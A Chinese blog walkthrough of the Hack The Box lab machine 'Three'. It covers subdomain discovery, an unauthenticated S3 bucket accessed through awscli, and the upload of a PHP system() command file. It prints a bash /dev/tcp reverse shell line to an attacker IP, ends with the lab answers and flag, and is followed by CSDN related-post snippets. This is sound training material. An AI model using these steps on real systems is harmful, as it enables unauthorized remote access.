HTB-Three(云服务)

已于 2024-09-02 23:39:17 修改
阅读量1k 收藏 16
点赞数 34
分类专栏: 安全靶场训练营 文章标签: web安全 网络安全 aws
于 2024-09-02 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58038441/article/details/141759206
版权

前言

  • 各位师傅大家好,我是qmx_07,今天给大家讲解Three靶机
    在这里插入图片描述

渗透过程

信息搜集

在这里插入图片描述
在这里插入图片描述

  • 服务器开启了22 SSH 和 80 HTTP服务端口

扫描目录

在这里插入图片描述

  • 服务器只有一个image图片文件,ssh 需要账号名密码

绑定域名 进行子域名扫描探测

在这里插入图片描述

  • 疑似域名,尝试绑定
echo "10.129.227.248 thetoppers.htb" | tee -a /etc/hosts

在这里插入图片描述

  • gobuster中 vhost 表示探测子域名
  • –append-domain 表示 返回正确的子域名
echo "10.129.227.248 s3.thetoppers.htb" | tee -a /etc/hosts
  • 绑定子域名
    在这里插入图片描述
  • s3子域名 s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service

awscli连接云存储桶

  • 介绍:AWS Command Line Interface (AWS CLI)是一种命令行工具,用于与AWS服务进行交互和管理。它提供了一组命令,可以用于创建、配置和管理AWS资源,以及进行自动化和脚本化操作

在这里插入图片描述

  • 安装awscli

在这里插入图片描述

  • 配置awscli,由于这个服务器不对身份进行验证,所以随便写写就行
    在这里插入图片描述
  • 通过云服务访问目录
  • 这个云服务 没有进行身份认证,所以可以直接访问
    在这里插入图片描述
system()函数代表 执行系统命令,参数是cmd

--endpoint=http://s3.thetoppers.htb 代表连接到自定义S3服务节点
s3 代表要与S3服务进行交互
cp 上传文件
xx.php 上传源文件
s3://thetoppers.htb s3协议目标地址

在这里插入图片描述

  • 上传命令执行文件,并查看是否存在
    在这里插入图片描述

通过nc反弹会话

在这里插入图片描述

  • 写一份reverse.sh 反弹会话shell文件,通过bash命令反弹nc会话
bash -i >& /dev/tcp/10.10.16.3/9000 0>&1  ip和端口根据实际决定
  • 开启http服务器
python3 -m http.server

在这里插入图片描述

  • 访问reverse.sh文件 并以bash形式运行
    在这里插入图片描述
  • 监听端口上线服务器

nc全称是netcat,用于创建 TCP/IP 连接、传输数据,以及监听和接收网络连接

  • -l:表示监听模式,用于创建一个监听器以等待传入连接。
  • -v:表示详细模式,用于显示详细的调试信息。
  • -n:表示禁用 DNS 解析,用于显示 IP 地址而不是主机名。
  • -p:指定监听的端口号
    在这里插入图片描述
  • flag:a980d99281a28d638ac68b9bf9453c2b

知识点讲解

Amazon S3

  • 介绍:亚马逊网络服务(AWS)提供的一种对象存储服务,旨在存储和检索任意量的数据
  • 对象存储:S3 将数据存储为对象,而不是传统的文件系统结构。每个对象由数据、元数据和唯一标识符(键)组成。
  • 桶(Bucket):S3 中的数据存储在称为“桶”的容器中。每个桶都有一个唯一的名称,并且可以在全球范围内访问。

答案

  • 1.服务器上开放了多少个TCP端口?

2

  • 2.在网站上找到的域名是?

thetoppers.htb

  • 3.哪个linux文件可以指定DNS绑定ip?

/etc/hosts

  • 4.子域名是什么?

s3.thetoppers.htb

  • 5.子域名上运行了哪些服务?

Amazon S3

  • 6.哪个工具可以和aws进行交互?

awscli

  • 7.什么命令可以配置aws?

aws configure

  • 8.什么命令可以列出s3的所有存储桶?

aws s3 ls

  • 9.服务器使用什么后端语言文件?

php

  • 10.flag?

a980d99281a28d638ac68b9bf9453c2b

总结

  • 今天讲解了S3云服务,awscli连接工具,子域名探测,http开启文件服务器,php命令执行文件,nc反弹会话
qmx_07
关注
专栏目录
HTB-BoardLight靶机笔记
LINGX5的博客
08-18 817
HTB的靶机BoardLight靶机地址:https://app.hackthebox.com/machines/BoardLight通过nmap扫描发现目标靶机开启了22,80端口对80端口的http服务进行了目录爆破和子域名爆破,发现了doblarr的cms框架,通过google搜索,找到了 Exploit-for-Dolibarr-17.0.0-CVE-2023-30253漏洞的利用脚本。通过利用cms的漏洞成功获得shell,通过对配置的阅读,发现了一组凭据!,成功获得了用户的shell。
HTB-Bastion
2201_75378806的博客
05-15 981
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
htb-Bounty
2201_75378806的博客
05-15 1988
端口扫描该网站本身只是提供了一个向导的图像merlin.jpgf12 抓包响应标头表明该站点由以下人员提供支持ASP.NETgobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx爆破目录呈现一个带有“浏览...”和“上传”按钮的简单表单:上传一个图片看看aspx shell 的副本,并尝试上传它。
htb-beep
m0_55772907的博客
09-15 966
一般
HTB-Timelapse
2201_75378806的博客
05-18 967
您还可以使⽤Windows LAPS⾃动管理和备份Windows Server Active Directory域控制器上的⽬录服务还原模式(DSRM)账户密码。使⽤LAPS(Local Administrator Password Solution),域控制器可以管理域中计算机的本地管理员密。要读取LAPS(本地管理员密码解决⽅案)密码,只需要使⽤Get-ADComputer命令,并明确请求ms。通常会创建⼀个⽤户组,并赋予其读取这些密码的权限,从⽽允许可信管理员访问所有本地管理员。
HTB-Cronos
TA不懒,但还没有添加简介
12-06 601
HTB-Cronos
htb-Mailing
whale_waves的博客
05-23 1458
Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在 Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分 9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。本文先讲复现过程,后讲漏洞原理。
HTB-Bastard
TA不懒,但还没有添加简介
04-07 573
HTB-Bastard
HTB-Jarvis
TA不懒,但还没有添加简介
04-16 477
HTB-Jarvis
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 604
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 259
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
Web安全 - 文件上传漏洞(File Upload Vulnerability)
小工匠
10-02 1715
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1090
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-29 710
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
ROS双线HTB流控配置手册:保障游戏体验
"ROS双线HTB操作手册" ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值